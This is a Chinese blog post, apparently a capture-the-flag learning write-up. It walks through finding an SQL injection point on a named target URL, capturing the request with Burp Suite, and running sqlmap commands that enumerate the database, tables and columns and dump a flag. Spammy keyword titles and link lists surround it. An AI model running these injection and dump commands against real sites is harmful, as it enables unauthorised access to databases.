当前位置: 首页 > news >正文

手机分销网站建设wordpress 搜索媒体库

手机分销网站建设,wordpress 搜索媒体库,网站开发自我介绍,网站建设验收标准使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点,搜索框和登录…

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

http://www.yayakq.cn/news/736425/

相关文章:

  • 优秀手机网站欣赏广州白云区公司注册
  • 河南网站建设设计价格wordpress+刷新
  • 金融网站开发文档下载网络推广员岗位职责
  • 廊坊网站网站建设化工厂网站建设
  • 如何对网站页面进行优化海东企业网站建设
  • 泉州网站开发人员建设网站只能是公司
  • 深圳企业网站建设开发费用下载网站源代码
  • 做视频网站流量费高吗聊城做网站做的不错的
  • 建设一个校园网站的可行性杭州seo整站优化
  • 桂林网站建设价格建服务网站需要多少钱
  • 做网站搞个物理服务器开发商不给办房产证怎么办
  • 开一个网站建设公司需要什么软件外贸网站建设原则
  • 长春网站选网诚传媒做网站的需求调研
  • 网站开发人员绩效如何计算策划营销
  • 海口网站建设推广dedecms网站tag标签静态化
  • 莱芜中考网站设计模板怎么设置
  • 外贸网站免费建设ui设计与制作
  • 游戏网站app怎么建立一个公司的网站
  • 泰州做企业网站cms监控手机客户端
  • 北京网站备案号wordpress是开源的吗
  • 有关大数据的网站及网址wordpress知更鸟主题
  • 茂名seo站内优化wordpress增加变量
  • 数据库网站 建设方案开发app需要多少钱?
  • php网站建设哪家好律师个人网站模板
  • 网站seo模块做外贸做的很好的网站
  • app网站制作下载柳州做网站seo哪家好
  • 软件开发与网站建设e福州怎么交医保
  • 公司网站备案需要每年做吗十大招商平台
  • 重庆官方网站有哪些番禺建设局网站首页
  • 看优秀摄影做品的网站做摄影和后期的兼职网站